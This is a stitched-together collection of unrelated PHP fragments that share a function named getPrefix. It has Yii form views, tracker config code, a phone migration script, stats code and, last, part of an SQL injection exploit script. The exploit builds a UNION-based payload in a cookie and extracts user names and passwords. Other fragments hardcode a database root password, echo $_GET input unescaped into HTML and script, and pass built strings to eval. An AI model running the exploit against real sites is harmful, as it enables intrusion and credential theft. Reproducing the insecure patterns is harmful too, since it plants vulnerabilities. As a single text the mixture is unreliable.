/** * @var yii\web\View $this * @var app\models\Catalog $model * @var yii\widgets\ActiveForm $form */ function getPrefix($count) { $ret = ''; for ($i = 0; $i < $count; $i++) { $ret .= ' '; } return $ret; } $parents = ['0' => 'root']; foreach ($treeList as $row) { $parents[$row['id']] = getPrefix($row['level']) . $row['name_zh']; //array_push($parents, $var) } ?> <div class="catalog-form"> <?php $form = ActiveForm::begin(); ?> <!-- <?php echo $form->field($model, 'parent_id')->textInput(); ?> -->
function toggleNS($uri = '', $ns_array = array()) { // Convert NS to full URL if (isNS($uri)) { $ns = getNS($uri); foreach ($ns_array as $candidate_ns => $candidate_prefix) { if ($ns == $candidate_ns) { return str_replace($candidate_ns . ':', $candidate_prefix, $uri); } } // Convert full URL to NS } elseif (isURL($uri)) { $prefix = getPrefix($uri); foreach ($ns_array as $candidate_ns => $candidate_prefix) { if ($prefix == $candidate_prefix) { return str_replace($candidate_prefix, $candidate_ns . ':', $uri); } } } return $uri; }
// EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. // //////////////////////////////////////////////////////////////////////////////////// $CURRENTPATH = dirname(__FILE__); global $btit_settings; if ($btit_settings["error"] == false) { if (version_compare(PHP_VERSION, '5.3.0', '<=')) { error_reporting(E_ALL & ~E_NOTICE & ~E_WARNING & ~E_STRICT & ~'E_DEPRECATED'); } else { error_reporting(E_ALL & ~E_NOTICE & ~E_WARNING & ~E_STRICT & ~E_DEPRECATED); } } //create some logging :) require_once $CURRENTPATH . '/conextra.php'; $signon = getConnection(); $prefix = getPrefix(); $logname = mysqli_fetch_row(mysqli_query($signon, "SELECT `value` FROM {$prefix}settings WHERE `key`='php_log_name' LIMIT 1")); $logpath = mysqli_fetch_row(mysqli_query($signon, "SELECT `value` FROM {$prefix}settings WHERE `key`='php_log_path' LIMIT 1")); $when = @date("d.m.y"); ini_set('log_errors', 'On'); // enable or disable php error logging (use 'On' or 'Off') ini_set('error_log', '' . $logpath[0] . '/' . $logname[0] . '_' . $when . '_.log'); // path to server-writable log file # // Emulate register_globals off # $php_version = explode(".", phpversion()); if ($php_version[0] <= 5 && $php_version[1] <= 2) { if (@ini_get('register_globals')) { $superglobals = array($_SERVER, $_ENV, $_FILES, $_COOKIE, $_POST, $_GET); if (isset($_SESSION)) {
'] #lona img { position: absolute; left: 45%; top: 45%; } </style> <img src="./applications/<?php echo $_GET['app']; ?> /icons/icon48x48.png" width="55" height="55" /> <script> setTimeout(function() {$('#lona').fadeOut(300,function(){ $(this).remove(); });}, 1200); </script> </div> <div id="topbar" class="<?php echo getPrefix("desactive", "value", $apps); ?> " style="color:#fff;width: 100%;height: 30px;position:relative;display:block;"> <script> $(document).ready(function(){ $("[name='<?php echo $_GET['app']; ?> '] #topbar").css("background",$("[name='<?php echo $_GET['app']; ?> '] header").css("background")); $("[name='<?php echo $_GET['app']; ?> '] #lona").css("background",$("[name='<?php
function getPrefix($count) { $ret = ''; for ($i = 0; $i < $count; $i++) { $ret .= ' '; } return $ret; } $options = '<option value="0">root</option>'; foreach ($boardArrayTree as $row) { $selected = ''; if ($model->parent_id == intval($row['id'])) { $selected = ' selected'; } $style = ''; $options .= '<option value="' . $row['id'] . '"' . $selected . $style . '>' . getPrefix($row['level']) . $row['name'] . '</option>'; } ?> <div class="board-form"> <?php $form = ActiveForm::begin(); ?> <div class="form-group field-board-parent_id required"> <label class="control-label" for="board-parent_id">父级</label> <select id="board-parent_id" class="form-control" name="Board[parent_id]"> <?php echo $options; ?>
<?php die; try { $db = new PDO('mysql:host=localhost;dbname=c2go', 'root', 'LKJkANVDowif0iewjk'); $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $db->exec("set names utf8"); } catch (PDOException $e) { echo $e->getMessage(); } $stmt = $db->query('SELECT `contact_phone`,`id` FROM `site_user_user`'); $rows = $stmt->fetchAll(); //$count = count($rows); foreach ($rows as $row) { $par = getPrefix($row[0]); $q = "UPDATE site_user_user SET contact_phone= '" . $par['tel'] . "' ,contact_phone_prefix= '" . $par['pref'] . "' WHERE id = " . $row[1] . ";"; echo $q, "\n"; /* try { $db->exec($q); } catch(PDOException $e) { echo $e->getMessage(); } */ } // echo 'UPDATE FROM site_user_user SET contact_phone= '.$par['tel'].' ,contact_phone_prefix= '.$par['pref'].' WHERE id = '.$row[1]."\n"; // echo $q."\n"; function getPrefix($str) { $pref = '';
function saveResult(&$_result, $keyPath, $saveTime = array('minKey', 'hourKey', 'dateKey')) { global $_c, $IP, $UV, $newUV; foreach ($saveTime as $mainKey) { //===================TIME FOR MINUTES================ $tmpPath = explode(":", $keyPath); eval("\$_re = &\$_result['" . getPrefix($_c[$mainKey]) . "']['" . getPrefix($_c[$mainKey], 2) . "']['" . implode("']['", $tmpPath) . "'];"); $_re['pv'] = !isset($_re['pv']) ? 1 : ++$_re['pv']; $_re['ip'] = !isset($_re['ip']) ? $IP[$mainKey] : $_re['ip'] + $IP[$mainKey]; $_re['uv'] = !isset($_re['uv']) ? $UV : $_re['uv'] + $UV; $_re['newUv'] = !isset($_re['newUv']) ? $newUV : $_re['newUv'] + $newUV; } }
### get valid album number if ($album == 0) { echo "[-] No valid album found...\n"; if ($argv[3] != 0) { echo "... Forcing\n"; $album = $argv[3]; } else { credits(); } } $page = 'thumbnails.php?album=' . $album; $GLOBALS['album'] = $album; echo "[+] Valid album number: " . $album . "\n"; $GLOBALS['cookies'] = getCookie($firstReply); ### get cookie from host $prefix = getPrefix($GLOBALS['cookies']); ### get cookie prefix echo "[+] Cookie prefix: " . $prefix . "\n"; $GLOBALS['prefix'] = $prefix; $etalon = toPage(sendit($page, 'GET', $c_cookies)); ### number of images at etalon page $first_sql = '0) UNION SELECT ' . $album . ' AND 1=1/*'; ### FIRST sql query - let's make valid album to be invisible $first_cookie = toCookie($first_sql); if (check($first_cookie) == 0) { echo "exploit failed..."; credits(); } ### if album is still visible - site is unvulnerable exploit('name'); exploit('password');